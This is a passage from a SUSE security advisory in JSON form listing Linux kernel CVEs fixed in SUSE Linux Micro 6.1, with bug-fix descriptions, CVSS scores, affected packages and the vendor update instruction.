"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
